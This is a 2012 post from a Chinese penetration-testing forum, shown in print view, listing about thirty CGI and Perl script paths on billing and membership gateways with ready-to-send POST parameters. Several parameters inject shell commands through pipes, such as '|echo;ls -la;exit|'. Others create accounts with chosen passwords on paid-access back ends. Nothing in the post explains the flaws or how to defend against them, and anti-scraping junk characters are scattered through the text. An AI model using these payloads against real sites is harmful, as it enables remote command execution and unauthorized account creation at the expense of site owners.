中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞＋使用方法 [打印本页]

---

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞＋使用方法
==============================
6 Y: d3 m: e4 O
% v- b! f4 U( \# ]# C/smspass.pl
username=username&password=password
: K" H0 B/ P, A5 D, c! v0 X2 M
/index.cgi
wei=ren&gen=command
9 e! `. m. w: s
/passmaster.cgi
9 H8 X4 k" h! }3 LAction=Add&Username=Username&Password=Password
& c' x4 D! @1 ^0 \9 d) o" r9 u1 W* N
# j( N' {: s4 Y5 d) B/accountcreate.cgi
5 W! r& E6 Z5 h& @" l# o/ vusername=username&password=password&ref1=|echo;ls|
3 W, b; K  Z3 v" z, ]! \( w% y% N. D
( {- M& q1 N4 t9 z5 `6 M/ C$ L/form.cgi
8 A8 g+ W+ ^: o. ?) ^, Rname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
# L- h7 p9 N! d# k. ^user=username&pass=Password&confirm=Password
3 q: b5 c+ ^7 S0 k- m
/ccbill-local.asp
post_values=username:password
5 n) K% d- M! |3 n
8 b8 U% Y+ m" b* j% x4 ]/count.cgi
pinfile=|echo;ls -la;exit|

. E7 W. M2 X8 V+ ^, \/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
9 y2 ~0 G! T$ T7 k$ r! Y6 _. K
5 i. t' w  |* |6 A/af.cgi
" K( G( P$ V' i! h2 Z% d+ n* `_browser_out=|echo;ls -la;exit;|

/modify.cgi
( y/ {$ r, Z7 h. x) Husername=username&password=password&expire=30

/openjournal.cgi
; [+ w6 K! f- l% N+ Qedit=1&ct=2&go=|echo;ls -al;exit|

. c) c! }" `3 e6 d1 Y* C/gx9passwd.cgi
9 z. n$ Q5 W  o3 z" g: b6 K* vcmd=ADD&user=username&pass=password
' V5 o) c$ |, A# n
/probecontrol.cgi
0 F0 A3 N2 }# T3 J  ^command=enable&username=username&password=password
6 ]2 E" O3 R0 C) Z' s
2 H9 m6 J4 V/ |* _3 s/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
2 L: f1 k) a% S5 |" t- N
/htadd.pl
* u6 k& O# [+ S0 F# X8 u8 e) m9 V+ Gconfigfile=|echo; ls -alt; exit
% F7 s) g# f9 Q, H/ o9 C
/gx9passwd.cgi
* B- F8 V$ _  [9 A! j- ~  vcmd=ADD&user=username&pass=password

/ibill*.pl
/ E( a/ |6 F! E3 W7 ^reqtype=add&authpwd=authpwd&username=username&password=password
& L4 ^7 D; U" o. c0 H' u; C+ v1 D
/cpay.cgi
! U  y& D/ @/ |  scommand=add_member&username=username(EMAIL)&password=password(DES)
6 g! Y9 Q: Y4 O8 E
. J' c. r; T9 W1 i4 v2 z/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
! X% E1 @: t6 u8 c! [
/usercontrol.cgi
command=enable&username=USER&password=PASS
: V1 ]$ D  z- S
1 k1 s( [9 A; A6 ]1 \! T/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

+ g( D. U* [4 g/ Q7 M" g* l$ q) E/addusr.pl
8 ^: ]8 Z; V& f* l; ~; m  a. \% F: euser=USER&pass=PASS&confirm=PASS
* u' y9 N/ S$ c+ \. n2 V$ V
/pincount.cgi
. F( h+ f9 q% W4 l3 O3 c7 p; f3 O( I; q/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
9 E5 c2 Z( `* f/ K2 S2 ?* Y
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
/ r/ q5 |' i1 @2 }; W& f6 }0 n. Gusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

+ x/ h& h# z' ?# \2 Q8 K/af.cgi
# \5 ~# X0 Y2 l8 z/env.cgi
$ Z4 A  T+ A2 ^( J6 eADD+;echo;pwd;exit
- e# E" e" o& m9 v2 b6 z; \0 m" f* a
. b, M% |- ?; y+ X8 o/count.cgi
pinfile=|echo;pwd;exit|
# T' N& d9 k9 G7 z$ S
0 G# b: p$ m; p5 D/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
& o& h( @2 J& w/ n' |8 {# p0 s
/add.cgi
username=username&password=password&expire=30
. P1 }. q/ Z+ B: d2 W1 g3 Y& y
==============================
+ j+ {1 f3 _* J. w, `

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2